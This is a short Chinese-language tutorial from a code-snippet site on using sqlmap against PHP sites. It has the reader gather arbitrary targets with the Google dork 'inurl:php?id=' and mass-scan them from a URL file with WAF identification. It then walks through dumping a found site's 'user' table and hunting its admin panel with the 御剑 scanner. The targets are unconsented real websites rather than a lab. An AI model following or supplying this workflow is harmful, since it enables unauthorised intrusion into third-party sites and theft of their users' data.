首页 > 代码库 > sqlmap测试php实战
sqlmap测试php实战
在Google上搜索inurl:php?id=
将搜集的url写到一个文件当中url.txt中
sqlmap -m url.txt --random-agent --thread=10 --timeout=5 --batch --retries=1 --identify-waf
-m指定url文件
--random-agent 使用随机代理
--thread=10 设置线程数为10
--timeout=5 连接超时5秒放弃
--batch 扫描过程中遇到选项时选择默认选项
--retries 连接失败尝试一次重连
--identify-waf 遇到waf的站点跳过
经过一段时间的扫描,扫描到一个存在sql注入漏洞的站点
扫描所有的表
针对其中的一个表user
扫描这个表
--dump 获取表内容
-T user指定表
获取到表的内容
找后台可以用御剑
sqlmap测试php实战
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。